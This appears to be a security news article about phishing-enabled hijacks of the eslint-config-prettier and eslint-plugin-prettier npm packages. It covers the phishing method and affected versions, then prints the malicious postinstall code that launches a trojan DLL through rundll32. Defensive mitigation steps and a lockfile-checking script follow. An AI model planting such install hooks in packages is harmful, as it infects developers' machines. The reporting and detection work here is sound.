In a stark reminder of the vulnerabilities plaguing open-source software, widely used npm packages were hijacked this week through a sophisticated phishing attack, transforming essential developer tools into malware distribution vehicles. The compromised libraries—eslint-config-prettier and eslint-plugin-prettier, which streamline code formatting for millions of JavaScript projects—were weaponized after their maintainer's credentials were stolen, enabling attackers to publish malicious versions that infect Windows machines upon installation. As reported by Ax Sharma for BleepingComputer, this incident is the latest in a series of supply chain assaults exploiting the trust-based nature of open-source communities.

The Phishing Scheme and Compromise

The attack began when the maintainer, known as JounQin, received a spoofed email disguised as an official npm support message urging him to "verify his account." The email, appearing to originate from [email protected], redirected to a fraudulent domain (npnjs[.]com), leading to credential theft. JounQin confirmed the breach in a GitHub thread, stating:

"It's this phishing email... I've deleted that npm token and will publish a new version ASAP. Thanks all, and sorry for my negligence."

Using the stolen npm token, attackers published unauthorized versions of the packages (eslint-config-prettier v8.10.1, 9.1.1, 10.1.6, 10.1.7 and eslint-plugin-prettier v4.2.2, 4.2.3). These versions lacked corresponding GitHub commits, raising immediate red flags among vigilant developers like Dasa Paddock, who flagged the anomalies in a GitHub issue. The packages were swiftly deprecated on npm, but not before they could be downloaded and executed in development environments.

Malware Mechanics: From Postinstall Script to Trojan DLL

The malicious versions included a deceptive postinstall script (install.js) designed to run automatically upon package installation. Ostensibly named to monitor disk space, the script contained a function logDiskSpace() that executed a bundled Windows DLL (node-gyp.dll) via the rundll32 process. Security researchers noted that this DLL acts as a trojan, with only 19 of 72 antivirus engines detecting it on VirusTotal at the time of the breach—highlighting its evasive capabilities. For clarity, here’s a snippet of the malicious code:

function logDiskSpace() {
  // Malicious execution flow
  const dllPath = require('path').join(__dirname, 'node-gyp.dll');
  require('child_process').exec(`rundll32.exe ${dllPath},EntryPoint`);
}

This code exemplifies how attackers leverage npm's scripting features to bypass defenses, turning routine developer workflows into infection vectors. Windows systems are particularly at risk, as the DLL can deploy additional payloads, exfiltrate data, or establish persistent access.

Mitigation Steps for Developers

If you use these packages, take immediate action:

  • Audit Dependencies: Check package-lock.json or yarn.lock for references to the compromised versions (eslint-config-prettier 8.10.1, 9.1.1, 10.1.6, 10.1.7 or eslint-plugin-prettier 4.2.2, 4.2.3). Remove and replace them with safe versions.
  • Scan Environments: Inspect CI/CD logs and runtime systems for execution of install.js or node-gyp.dll, especially on Windows. Rotate all exposed secrets (e.g., API keys, tokens) used during builds after July 18.
  • Enhance Vigilance: Monitor other packages by the same maintainer for tampering and implement multi-factor authentication (MFA) for npm accounts to thwart credential theft.
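
The dependency audit in the first step can be scripted. The following Node.js code is an added example, not code from the article or from the affected projects: it checks a parsed package-lock.json (both the flat v2/v3 layout and the nested v1 layout) against the exact compromised versions listed above. The names COMPROMISED and findCompromised and the sample lockfile are constructed for illustration.

```javascript
// Added example: compromised releases exactly as listed in the article.
const COMPROMISED = new Map([
  ['eslint-config-prettier', ['8.10.1', '9.1.1', '10.1.6', '10.1.7']],
  ['eslint-plugin-prettier', ['4.2.2', '4.2.3']],
]);

// Takes a parsed package-lock.json (lockfileVersion 1, 2 or 3) and returns
// [{ name, version, location }] for every pinned compromised release.
function findCompromised(lock) {
  const hits = [];
  const check = (name, version, location) => {
    if ((COMPROMISED.get(name) || []).includes(version)) {
      hits.push({ name, version, location });
    }
  };
  if (lock.packages) {
    // v2/v3: flat map keyed by install path, e.g.
    // "node_modules/a/node_modules/@scope/b" -> package "@scope/b".
    // entry.name is only set for the root project and for aliased installs.
    for (const [key, entry] of Object.entries(lock.packages)) {
      const name = entry.name || key.split('node_modules/').pop();
      if (name) check(name, entry.version, key);
    }
  } else {
    // v1: nested "dependencies" trees, so walk them recursively.
    const walk = (deps, trail) => {
      for (const [name, entry] of Object.entries(deps || {})) {
        check(name, entry.version, trail.concat(name).join(' > '));
        walk(entry.dependencies, trail.concat(name));
      }
    };
    walk(lock.dependencies, []);
  }
  return hits;
}

// Constructed sample lockfile (not taken from any real project).
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/eslint-config-prettier': { version: '10.1.7', dev: true },
    'node_modules/eslint-plugin-prettier': { version: '5.5.1', dev: true },
    'node_modules/tool/node_modules/eslint-plugin-prettier': { version: '4.2.3' },
  },
};
console.log(findCompromised(sampleLock));
```

To run it on a real project, pass it the result of JSON.parse on the contents of package-lock.json. yarn.lock uses a different format and is not covered by this example.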

Broader Implications for Open-Source Security

This breach is not isolated. Recent months have seen similar attacks, including the hijacking of 17 Gluestack packages for RAT deployment and npm info-stealer campaigns. Each incident exposes the fragility of software supply chains, where a single maintainer’s compromised credentials can endanger millions of users. The open-source model’s reliance on volunteer maintainers—often without enterprise-grade security resources—creates a systemic risk that attackers increasingly exploit.

As the industry grapples with these challenges, this event serves as a catalyst for adopting stricter publishing controls, automated dependency scanning, and enhanced maintainer education. Until then, the onus falls on developers to fortify their workflows, proving that in the digital age, trust must be coupled with relentless verification to safeguard the tools that power our code.

Source: BleepingComputer (Ax Sharma), July 19, 2025.